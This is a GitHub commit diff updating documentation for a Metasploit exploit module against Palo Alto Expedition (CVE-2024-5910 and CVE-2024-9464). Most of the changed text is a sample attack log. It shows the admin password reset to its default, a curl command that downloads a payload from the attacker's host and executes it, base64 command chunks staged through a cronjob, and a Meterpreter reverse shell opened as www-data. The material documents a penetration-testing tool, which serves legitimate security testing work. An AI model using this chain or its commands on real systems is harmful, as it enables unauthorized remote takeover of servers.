Skip to content

Commit a09ca39

Browse files
h4x-x0rbwatters-r7
andauthored
Update documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
Co-authored-by: Brendan <[email protected]>
1 parent 61486cd commit a09ca39

File tree

1 file changed

+37
-10
lines changed

1 file changed

+37
-10
lines changed

documentation/modules/exploit/linux/http/paloalto_expedition_rce.md

Lines changed: 37 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -58,29 +58,56 @@ Running the exploit against Expedition v1.2.91 on Ubuntu Server 20.04.1, using c
5858
similar to the following:
5959

6060
```
61-
msf6 exploit(linux/http/paloalto_expedition_rce) > exploit
61+
msf6 exploit(linux/http/paloalto_expedition_rce) > exploit
6262
63+
[*] Command to run on remote host: curl -so /tmp/zRe http://192.168.137.204:8080/qv_gAdz7yjcgH-ohM3GesA; chmod +x /tmp/zRe; /tmp/zRe &
64+
[*] Fetch handler listening on 192.168.137.204:8080
65+
[*] HTTP server started
66+
[*] Adding resource /qv_gAdz7yjcgH-ohM3GesA
6367
[*] Started reverse TCP handler on 192.168.137.204:4444
6468
[*] Running automatic check ("set AutoCheck false" to disable)
6569
[+] Admin password successfully restored to default value paloalto (CVE-2024-5910).
6670
[+] Successfully authenticated
71+
[*] Got csrftoken: MTczMTM4MjY0NUNRV0RkNXBXR3Vic2hkR1ZZTHBSQTd1cWY5MjVWYWIw
6772
[*] Version retrieved: 1.2.91
68-
[*] Vulnerable to CVE-2024-5910 and appears to be vulnerable to CVE-2024-9464.
6973
[+] The target appears to be vulnerable.
74+
[*] Command chunk size = 30
75+
[+] Successfully authenticated
76+
[*] Got csrftoken: MTczMTM4MjY0NnpDVDRUcXdDRWhvZ09HWDNnMFdHUW81cXU2aHppTEdE
7077
[*] Adding a new cronjob...
71-
[*] Injecting OS command...
72-
[*] Sending stage (3045380 bytes) to 192.168.137.203
73-
[*] Meterpreter session 1 opened (192.168.137.204:4444 -> 192.168.137.203:49006) at 2024-10-13 19:30:10 -0400
74-
[*] cleanup file: /tmp/j
78+
[*] Staging chunk 1 of 9
79+
[*] Running command: echo -n "echo Y3VybCAtc28gL3RtcC96UmUga" > /tmp/fglGT
80+
[*] Staging chunk 2 of 9
81+
[*] Running command: echo -n "HR0cDovLzE5Mi4xNjguMTM3LjIwNDo" >> /tmp/fglGT
82+
[*] Staging chunk 3 of 9
83+
[*] Running command: echo -n "4MDgwL3F2X2dBZHo3eWpjZ0gtb2hNM" >> /tmp/fglGT
84+
[*] Staging chunk 4 of 9
85+
[*] Running command: echo -n "0dlc0E7IGNobW9kICt4IC90bXAvelJ" >> /tmp/fglGT
86+
[*] Staging chunk 5 of 9
87+
[*] Running command: echo -n "lOyAvdG1wL3pSZSAm|((command -v" >> /tmp/fglGT
88+
[*] Staging chunk 6 of 9
89+
[*] Running command: echo -n " base64 >/dev/null && (base64 " >> /tmp/fglGT
90+
[*] Staging chunk 7 of 9
91+
[*] Running command: echo -n "--decode || base64 -d)) || (co" >> /tmp/fglGT
92+
[*] Staging chunk 8 of 9
93+
[*] Running command: echo -n "mmand -v openssl >/dev/null &&" >> /tmp/fglGT
94+
[*] Staging chunk 9 of 9
95+
[*] Running command: echo -n " openssl enc -base64 -d))|sh" >> /tmp/fglGT
96+
[+] Command staged; command execution requires a timeout and will take a few seconds.
97+
[*] Running command: cat /tmp/fglGT | sh && rm /tmp/fglGT
98+
[*] Client 192.168.137.205 requested /qv_gAdz7yjcgH-ohM3GesA
99+
[*] Sending payload to 192.168.137.205 (curl/7.68.0)
100+
[*] Transmitting intermediate stager...(126 bytes)
101+
[*] Sending stage (3045380 bytes) to 192.168.137.205
102+
[*] Meterpreter session 10 opened (192.168.137.204:4444 -> 192.168.137.205:58030) at 2024-11-11 22:37:40 -0500
75103
[*] Check thy shell.
76104
77-
meterpreter > sysinfo
78-
Computer : 192.168.137.203
105+
meterpreter > sysinfo
106+
Computer : 192.168.137.205
79107
OS : Ubuntu 20.04 (Linux 5.4.0-42-generic)
80108
Architecture : x64
81109
BuildTuple : x86_64-linux-musl
82110
Meterpreter : x64/linux
83-
meterpreter > getuid
111+
meterpreter > getuid
84112
Server username: www-data
85-
meterpreter >
86113
```

0 commit comments

Comments
 (0)